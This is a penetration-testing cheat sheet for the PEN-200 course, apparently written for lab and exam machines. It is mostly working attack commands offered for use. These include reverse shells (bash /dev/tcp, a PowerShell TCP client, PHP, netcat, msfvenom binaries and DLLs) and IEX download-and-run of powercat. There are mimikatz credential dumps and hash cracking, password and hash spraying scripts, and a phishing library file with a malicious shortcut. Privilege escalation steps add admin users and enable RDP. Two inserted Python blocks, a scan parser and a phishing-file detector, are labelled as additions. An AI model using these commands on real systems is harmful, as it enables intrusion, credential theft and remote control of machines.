PEN-200 Cheat Sheet
Setting Up
Download Binaries
List of Binaries
GodPotato.exe
PrintSpoofer.exe
Powerview.ps1
Sharphound.ps1
fastscan.sh
netspray.sh
nethash.sh
chisel
chisel.exe
chisel_amd64
ligolo-ng
ligolo_agent_win.exe
linpeas.sh
winpeas.exe
mimikatz.exe
nc64-32.exe
powercat.ps1
pspy64
wolfwebshell.php
Stand Up Python Server
python -m http.server 8000
Stand up SMB Share
impacket-smbserver smbfolder . -smb2support -user mason -password mason
Stand up Chisel Server
chisel server --port 9999 --reverse
Stand up Webdav Server
wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root .
Enumerating Externally
Port Scan
Slow Scan
nmap -sC -sV -p- -oN external.output 192.168.245.0/24
Fast Scan
./fastscan.sh 192.168.223.123 name
Contents:
#!/bin/bash
# Usage: ./fastscan.sh <target> <output-name>
target="$1"
name="$2"
echo "Running quick Nmap scan to detect open ports."
nmap -Pn -T4 --max-retries 0 -p- -oN "$name.quick" "$target"
echo " "
echo "Running deeper Nmap scan on detected open ports."
# Pull the port numbers of open ports out of the quick scan into a comma-separated list.
ports=$(grep open "$name.quick" | grep -v Warning | sed 's/ open //g' | awk -F '/' '{print $1}' | paste -sd, -)
nmap -sV -A -p "$ports" -oN "$name.full" "$target"
echo " "
echo "See below for a quick reference list of open ports and detected banners."
grep open "$name.full" | grep -v Warning | sed 's/ open //g'
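The second nmap pass in fastscan.sh depends on pulling the open port numbers out of the first pass's -oN output. As an added example, not part of the page's script, here is a Python parser that does the same extraction on a constructed sample of that output, with an option to also include ports nmap reports as open|filtered (common with --max-retries 0):

```python
import re

# Constructed sample of the -oN output from fastscan.sh's first pass
# (nmap -Pn -T4 --max-retries 0 -p- -oN name.quick <target>).
SAMPLE_QUICK = """\
# Nmap 7.94 scan initiated Mon Jan  1 10:00:00 2024 as: nmap -Pn -T4 --max-retries 0 -p- -oN name.quick 192.168.223.123
Warning: 192.168.223.123 giving up on port because retransmission cap hit (0).
Nmap scan report for 192.168.223.123
Host is up (0.020s latency).
Not shown: 65530 closed tcp ports (reset)
PORT      STATE         SERVICE
22/tcp    open          ssh
80/tcp    open          http
135/tcp   open          msrpc
445/tcp   open          microsoft-ds
3389/tcp  open|filtered ms-wbt-server
# Nmap done at Mon Jan  1 10:01:00 2024 -- 1 IP address (1 host up) scanned in 60.00 seconds
"""

# One port line of nmap's normal output: "<port>/<proto>  <state>  <service> [version]".
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")


def parse_ports(text, include_filtered=False):
    """Return (port, proto, service) tuples for open ports in nmap -oN output.

    open|filtered ports are skipped unless include_filtered is set, so the
    deeper scan is not padded with ports nmap could not confirm.
    """
    found = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if not m:
            continue  # header, Warning and summary lines never match
        port, proto, state, service = m.groups()
        if state == "open" or (include_filtered and state == "open|filtered"):
            found.append((int(port), proto, service))
    return found


def port_arg(text, include_filtered=False):
    """Comma-separated port list suitable for the second pass's -p argument."""
    ports = sorted({p for p, _, _ in parse_ports(text, include_filtered)})
    return ",".join(str(p) for p in ports)


if __name__ == "__main__":
    for port, proto, service in parse_ports(SAMPLE_QUICK, include_filtered=True):
        print(f"{port}/{proto}\t{service}")
    print("-p", port_arg(SAMPLE_QUICK))
```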
Check for Public Exploits
searchsploit key words
Check FTP
FTP
ftp anonymous@192.168.245.249 14020
Filezilla
filezilla anonymous@192.168.245.249
Check SMB
smbclient -L 192.168.245.247
Download from SMB share with:
get file.txt
SMBMap
smbmap -H 192.168.123.123
Check Web Servers
Quick Scan
gobuster dir -u http://192.168.199.249 -w /usr/share/wordlists/dirb/big.txt -o MS01 -x php,aspx
Comprehensive Scan
gobuster dir -u http://192.168.199.249 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o MS01 -x php,aspx
Files Scan
gobuster dir -u http://192.168.199.249 -w /usr/share/wordlists/dirb/big.txt -o MS01 -x php,aspx
Follow Redirects and Ignore Bad Codes
gobuster dir -u http://192.168.223.156:8083/api/v1 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o Frankfurt -r -k
Foothold on Windows
Land as New User
Check for privileges
whoami /priv
Looking for:
- SeImpersonatePrivilege
- SeBackupPrivilege
- SeAssignPrimaryToken
- SeLoadDriver
- SeDebug
Check for Interesting Files
Get-ChildItem -Path C:\Users\ -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx,*.config,*.log,*.kdbx,*ini,*.ps1,*.exe,*.zip -File -Recurse -ErrorAction SilentlyContinue; ls C:\
List files in small directories:
tree /F
Check history files:
(Get-PSReadlineOption).HistorySavePath
cat FILE
ls DIRECTORY
Useful Windows Binaries
List of binaries:
winPEAS
mimikatz
GodPotato
SharpHound
PowerView
PrintSpoofer
Download binaries onto machine:
cd C:\Users\Public; iwr -uri http://192.168.49.124:8000/winPEASx64.exe -Outfile winPEAS.exe; iwr -uri http://192.168.49.124:8000/mimikatz.exe -Outfile mimikatz.exe; iwr -uri http://192.168.49.124:8000/GodPotato-NET4.exe -Outfile GodPotato.exe; iwr -uri http://192.168.49.124:8000/SharpHound.ps1 -Outfile SharpHound.ps1; iwr -uri http://192.168.49.124:8000/PowerView.ps1 -Outfile powerview.ps1; iwr -uri http://192.168.49.124:8000/PrintSpoofer64.exe -Outfile print.exe;
Run and Review winPEAS
.\winPEAS.exe
Run and Review Sharphound
If on a domain:
. .\SharpHound.ps1;Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\Users\Public\ -OutputPrefix "WS26"; $pass = ConvertTo-SecureString 'mason' -AsPlainText -Force; $pass; $cred = New-Object System.Management.Automation.PSCredential('mason', $pass); $cred; New-PSDrive -Name mason -PSProvider FileSystem -Credential $cred -Root \\192.168.49.124\smbfolder;copy *BloodHound.zip \\192.168.49.124\smbfolder\
Achieved Windows Admin
Check for Interesting Files
Get-ChildItem -Path C:\Users\ -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx,*.config,*.log,*.kdbx,*ini,*.ps1,*.exe,*.zip -File -Recurse -ErrorAction SilentlyContinue; ls C:\
List files in small directories:
tree /F
Run and Review winPEAS
.\winPEAS.exe
REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1
Check Mimikatz
Check password hashes
.\mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit
Check Kerberos tickets
.\mimikatz "privilege::debug" "sekurlsa::tickets" exit
Dump hashes from the SAM on a live machine (reads the registry directly, so it needs an elevated token):
.\mimikatz "privilege::debug" "token::elevate" "lsadump::sam" exit
Dump hashes from existing SAM and SYSTEM files
.\mimikatz "lsadump::sam /system:SYSTEM /sam:SAM" exit
Foothold on Linux
Landed as User
Run and Review linPEAS
wget http://192.168.49.104:8000/linpeas.sh; chmod +x linpeas.sh; ./linpeas.sh
Check environment files, history files, and unknown SetUID files.
Check Processes
wget http://192.168.45.234:8000/pspy64; chmod +x pspy64; ./pspy64
Achieved Admin
Run and Review linPEAS
wget http://192.168.45.234:8000/linpeas.sh; chmod +x linpeas.sh; ./linpeas.sh
Pivoting
Ligolo
https://medium.com/@Poiint/pivoting-with-ligolo-ng-0ca402abc3e9
sudo ip tuntap add user kali mode tun ligolo
sudo ip link set ligolo up
./proxy -selfcert
Follow the instructions in the article; compiling from source worked better than installing via apt.
Windows:
iwr -uri http://192.168.45.234:8000/ligolo_agent_win.exe -Outfile agent.exe; .\agent.exe -connect 192.168.45.234:11601 --ignore-cert
session
sudo ip route add 10.10.162.0/24 dev ligolo
Insert any other command here, using the IP without proxychains
impacket-mssqlclient sql_svc:'Dolphin1'@10.10.162.148 -windows-auth
Add listener for python server
listener_add --addr 0.0.0.0:7777 --to 127.0.0.1:8000 --tcp
Add listener for reverse shell
listener_add --addr 0.0.0.0:8888 --to 127.0.0.1:443 --tcp
Chisel
Windows Dynamic Port Forwarding
cd C:\Users\Public; iwr -uri http://192.168.49.104:8000/chisel.exe -Outfile chisel.exe; .\chisel.exe client 192.168.49.104:9999 R:socks
Linux Dynamic Port Forwarding
wget http://192.168.45.234:80/chisel_amd64; chmod +x chisel_amd64; ./chisel_amd64 client 192.168.45.234:9999 R:socks
SSH
It may be necessary to upgrade certain types of shells before using SSH:
python3 -c 'import pty; pty.spawn("/bin/bash")'
Remote Port Forwarding
Remote Port Forwarding (SSH from Kali to Pivot)
ssh web_svc@192.168.195.147 -D 9090 -R *:7777:localhost:7777 -R *:8888:localhost:8888
Remote Port Forwarding (SSH from Pivot to Kali, I believe)
ssh kali@192.168.49.104 -D 9090 -R *:6666:localhost:6666 -R *:8888:localhost:8888
Local Port Forwarding
Local SSH port forward (this runs from the victim machine; connections to port 7777 are looped back to the SSH server's port 80 or forwarded farther):
ssh -N -L 0.0.0.0:7777:127.0.0.1:80 USER@HOST
Download a file
Windows
Via SMB
Authenticated
$pass = ConvertTo-SecureString 'mason' -AsPlainText -Force; $pass; $cred = New-Object System.Management.Automation.PSCredential('mason', $pass); $cred; New-PSDrive -Name mason -PSProvider FileSystem -Credential $cred -Root \\192.168.45.234\smbfolder;copy File.txt \\192.168.45.234\smbfolder\
Unauthenticated
copy File.txt \\192.168.45.234\smbfolder\
Download via PowerShell
iwr -uri http://192.168.45.234:8000/file.txt -Outfile file.txt
Via SCP
scp ./file.txt kali@192.168.45.234:/home/kali/exam1
Hashcat Cracking
KeePass
hashcat -m 13400 jimkp.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
NTLM
hashcat -m 1000 jimkp.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
Kerberos
Check the prefixes of the hash and see what matches:
hashcat -h | grep -i kerberos
hashcat -m XXXX jimkp.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
MD5
hashcat -m 0 jimkp.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
Unix
Check the prefixes of the hash and see what matches:
hashcat -h | grep -i unix
hashcat -m XXXX jimkp.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
Secretsdump
Use impacket-secretsdump on SAM
impacket-secretsdump -system SYSTEM -sam SAM local
Guess Credentials
Netexec User/Pass
Works with single string values or text file lists.
netexec smb 172.16.206.0/24 -u user -p password --continue-on-success
Protocols included:
SMB
SSH
RDP
WINRM
FTP
LDAP
WMI
VNC
MSSQL
Don't forget about local accounts vs domain accounts with the --local-auth flag.
Netspray.sh User/Pass
Wrapper around Netexec commands:
./netspray.sh 192.168.234.234 user password
Contents:
#!/bin/bash
# Usage: ./netspray.sh <target or CIDR> <user> <password>
target="$1"; user="$2"; pass="$3"
echo "Testing SMB Connections with Domain Credentials"
netexec smb "$target" -u "$user" -p "$pass"
echo "Testing SMB Connections with Local Credentials"
netexec smb "$target" -u "$user" -p "$pass" --local-auth
echo "Testing SSH Connections"
netexec ssh "$target" -u "$user" -p "$pass"
echo "Testing RDP Connections with Domain Credentials"
netexec rdp "$target" -u "$user" -p "$pass"
echo "Testing RDP Connections with Local Credentials"
netexec rdp "$target" -u "$user" -p "$pass" --local-auth
echo "Testing WinRM Connections with Domain Credentials"
netexec winrm "$target" -u "$user" -p "$pass"
echo "Testing WinRM Connections with Local Credentials"
netexec winrm "$target" -u "$user" -p "$pass" --local-auth
echo "Testing LDAP Connections"
netexec ldap "$target" -u "$user" -p "$pass"
echo "Testing FTP Connections"
netexec ftp "$target" -u "$user" -p "$pass"
echo "Testing WMI Connections"
netexec wmi "$target" -u "$user" -p "$pass"
echo "Testing VNC Connections"
netexec vnc "$target" -u "$user" -p "$pass"
echo "Testing MSSQL Connections"
netexec mssql "$target" -u "$user" -p "$pass"
Netexec Hashes
Works with single string values or text file lists.
netexec smb 172.16.206.0/24 -u user -H SFSDFSDFSDFDSFSDFSDFSDF --continue-on-success
Protocols included:
SMB
SSH
RDP
WINRM
FTP
LDAP
WMI
VNC
MSSQL
Don't forget about local accounts vs domain accounts with the --local-auth flag.
NetHash.sh Hashes
Wrapper around Netexec commands:
./nethash.sh 192.168.234.234 user SDFSDFSDFSDFSDFDSF
Contents:
#!/bin/bash
# Usage: ./nethash.sh <target or CIDR> <user> <NT hash>
target="$1"; user="$2"; hash="$3"
echo "Testing SMB Connections with Domain Credentials"
netexec smb "$target" -u "$user" -H "$hash"
echo "Testing SMB Connections with Local Credentials"
netexec smb "$target" -u "$user" -H "$hash" --local-auth
echo "Testing SSH Connections"
netexec ssh "$target" -u "$user" -H "$hash"
echo "Testing RDP Connections with Domain Credentials"
netexec rdp "$target" -u "$user" -H "$hash"
echo "Testing RDP Connections with Local Credentials"
netexec rdp "$target" -u "$user" -H "$hash" --local-auth
echo "Testing WinRM Connections with Domain Credentials"
netexec winrm "$target" -u "$user" -H "$hash"
echo "Testing WinRM Connections with Local Credentials"
netexec winrm "$target" -u "$user" -H "$hash" --local-auth
echo "Testing LDAP Connections"
netexec ldap "$target" -u "$user" -H "$hash"
echo "Testing FTP Connections"
netexec ftp "$target" -u "$user" -H "$hash"
echo "Testing WMI Connections"
netexec wmi "$target" -u "$user" -H "$hash"
echo "Testing VNC Connections"
netexec vnc "$target" -u "$user" -H "$hash"
echo "Testing MSSQL Connections"
netexec mssql "$target" -u "$user" -H "$hash"
Use Credentials
WinRM
User/Pass
evil-winrm -i 172.16.206.247 -u user -p "password"
Hashes
evil-winrm -i 172.16.206.247 -u user -H 2892D26CDF84D7A70E2EB3B9F05C4266
Upload or download
upload /home/kali/oscpa/winPEASx64.exe .
PsExec
User/Pass
impacket-psexec domain.com/user:'password'@172.16.111.254
Hashes
impacket-psexec -hashes 00000000000000000000000000000000:f0397ec5af49971f6efbdb0787704666 user@172.16.6.240
SMBExec
User/Pass
impacket-smbexec domain.com/user:'password'@172.16.111.254
Hashes
impacket-smbexec -hashes 00000000000000000000000000000000:f0397ec5af49971f6efbdb07877046b3 user@172.16.6.240
WmiExec
User/Pass
impacket-wmiexec domain.com/user:'password'@172.16.111.254
Hashes
impacket-wmiexec -hashes :2892D26CDF84D7A70E2EB3B9F05C4266 user@192.168.50.73
Possible Phishing
Create Library file:
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>@windows.storage.dll,-34582</name>
<version>6</version>
<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1003</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<isSupported>false</isSupported>
<simpleLocation>
<url>http://192.168.45.234</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>
Create Shortcut file with this command as its target:
powershell -nop -c "IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.45.176:8000/powercat.ps1');powercat -c 192.168.45.176 -p 443 -e powershell"
Send email:
sudo swaks -t jim@domain.com --from maildmz@domain.com --attach @config.Library-ms --server 192.168.196.189 --body @body.txt --header "Subject: Something Broke" --suppress-data -ap
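The Library-ms file above points the library's search connector at a remote HTTP location instead of a local folder, which is what makes it useful as a phishing attachment. As an added detection example that is not part of the page, here is a Python check that parses a .Library-ms file and reports any connector location with an http/https URL; both sample files are constructed, the suspicious one modelled on the file above:

```python
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

NS = {"lib": "http://schemas.microsoft.com/windows/2009/library"}

# Constructed sample modelled on the Library-ms file above: the search connector's
# simpleLocation points at a remote HTTP host.
SUSPICIOUS_LIBRARY = """<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>@windows.storage.dll,-34582</name>
<version>6</version>
<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1003</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<isSupported>false</isSupported>
<simpleLocation>
<url>http://192.168.45.234</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>
"""

# Constructed benign library that only references a local folder, for comparison.
BENIGN_LIBRARY = """<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>@shell32.dll,-34575</name>
<version>6</version>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<simpleLocation>
<url>C:\\Users\\Public\\Documents</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>
"""


def remote_locations(xml_text):
    """Return every simpleLocation url in a Library-ms document that uses http or https."""
    root = ET.fromstring(xml_text)
    found = []
    for url_el in root.findall(".//lib:simpleLocation/lib:url", NS):
        url = (url_el.text or "").strip()
        # Local paths parse as scheme "c" or "", so only real web schemes are flagged.
        if urlparse(url).scheme.lower() in ("http", "https"):
            found.append(url)
    return found


if __name__ == "__main__":
    for label, doc in (("suspicious", SUSPICIOUS_LIBRARY), ("benign", BENIGN_LIBRARY)):
        print(label, "->", remote_locations(doc) or "no remote locations")
```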
Web Shell Payloads
Download webshell
wget http://192.168.45.234:8000/wolfwebshell.php
Reverse Shell Payloads
Use revshells.com first and foremost.
Windows
PowerShell Encoded
Encode the payload first:
$Text = '$client = New-Object System.Net.Sockets.TCPClient("10.10.162.147",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
$EncodedText =[Convert]::ToBase64String($Bytes)
$EncodedText
Use the payload:
powershell -enc <EncodedText>
PowerShell Unencoded
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.45.234',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
PowerShell with PowerCat
powershell -nop -c "IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.45.234:8000/powercat.ps1');powercat -c 192.168.45.234 -p 443 -e powershell"
Binary with MSFVenom
Create Binary
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.234 LPORT=443 -f exe -o reverse.exe
Search for payloads
msfvenom -l payloads --platform linux --arch x64
Linux
Bash
/bin/bash -c 'bash -i >& /dev/tcp/192.168.45.234/443 0>&1'
Busybox
/bin/busybox nc 192.168.45.160 80 -e /bin/bash
PHP
/usr/bin/php -r '$sock=fsockopen("192.168.45.234",443);exec("/bin/sh -i <&3 >&3 2>&3");'
Reviewing Git Data
After navigating to the repository, you can check its status:
git status
Check the logs:
git log
Copy a commit hash from the git log to see the diff it introduced:
git show 8b430c17c16e6c0515e49c4eafdd129f719fde66
AS-REP Roasting
Need working AD credentials first. Helps to check Bloodhound for possible targets.
Use impacket to AS-REP roast user:
proxychains -q impacket-GetNPUsers -dc-ip 172.16.156.6 -request -outputfile michelle-asrep.hash domain.com/user
Kerberoasting
Need working AD credentials first. Helps to check Bloodhound for possible targets.
Use impacket to Kerberoast user:
proxychains -q impacket-GetUserSPNs -request -dc-ip 10.10.162.146 oscp.exam/user
Windows Service Binary Injection
Watch for a recurring process for the service:
while (1) {get-process scheduler -ErrorAction SilentlyContinue; sleep 0.1}
View all services on the machine:
Get-CimInstance -ClassName win32_service | Select Name,State,PathName
Replace service binary with reverse shell:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.234 LPORT=443 -f exe -o reverse.exe
Stop, Start, or Restart services in Powershell:
Stop-Service scheduler
DLL Hijacking
Move the service binary to a Windows machine and use ProcMon to review the DLLs it tries to load.
Once identified, replace vulnerable DLL with reverse shell and restart service binary.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.234 LPORT=443 -f dll -o Custom.dll
Custom compilation may be necessary; review the course material.
SeImpersonate Privileges
Using GodPotato
Basic command syntax
.\GodPotato -cmd "cmd /c whoami"
Using a reverse shell:
iwr -uri http://192.168.45.234:8000/nc64-32.exe -Outfile nc.exe; .\GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.45.234 8443"
Add user to an admin group:
.\GodPotato -cmd "cmd /c net localgroup administrators adrian /add"
Change user's password:
.\GodPotato -cmd "cmd /c net user damon mason"
May be needed to enable RDP after adding the user to the RDP group:
.\GodPotato -cmd 'cmd /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'
.\GodPotato -cmd 'cmd /c netsh advfirewall firewall set rule group="remote desktop" new enable=Yes'
Add user and add them to admin group:
.\GodPotato -cmd "cmd /c net user mason mason /add"
.\GodPotato -cmd "cmd /c net localgroup administrators mason /add"
PrintSpoofer
.\print.exe -i -c powershell.exe
.\print.exe -c whoami
Databases
MySQL/MariaDB
Login:
sudo mysql -u root
mysql -u user -p7NVLVTDGJ38HM2GG -h 127.0.0.1
Dump the database:
.\mysqldump.exe -u root --all-databases -r db_backup.sql
Commands in the database:
create database hello;
use hello;
source file.sql
show databases;
use froxlor;
show tables;
show columns from customers from oscdb;
select customers_password from customers;
SNMP
Look for interesting things with SNMPWalk
snmpwalk -v 2c -c public 192.168.208.149 NET-SNMP-EXTEND-MIB::nsExtendObjects
SharpGPOAbuse
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount charlotte --GPOName "Default Domain Policy" --force